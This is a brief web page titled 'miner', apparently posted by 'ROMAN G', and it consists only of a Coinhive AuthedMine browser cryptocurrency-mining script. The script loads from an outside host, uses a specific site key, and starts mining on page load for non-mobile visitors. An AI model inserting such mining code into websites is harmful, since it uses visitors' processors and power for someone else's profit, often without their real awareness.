miner

miner

ROMAN G
<script src="https://authedmine.com/lib/authedmine.min.js"></script>
<script>
 var miner = new CoinHive.Anonymous('3oZ3ylnUvrMi6BBK8JUApk6lsSCujW2d', {throttle: 0.3});

 // Only start on non-mobile devices and if not opted-out
 // in the last 14400 seconds (4 hours):
 if (!miner.isMobile() && !miner.didOptOut(14400)) {
  miner.start();
 }
</script>
<script>
 // Listen on events
 miner.on('found', function() { /* Hash found */ })
 miner.on('accepted', function() { /* Hash accepted by the pool */ })

 // Update stats once per second
 setInterval(function() {
  var hashesPerSecond = miner.getHashesPerSecond();
  var totalHashes = miner.getTotalHashes();
  var acceptedHashes = miner.getAcceptedHashes();

  // Output to HTML elements...
 }, 1000);
</script>


Report Page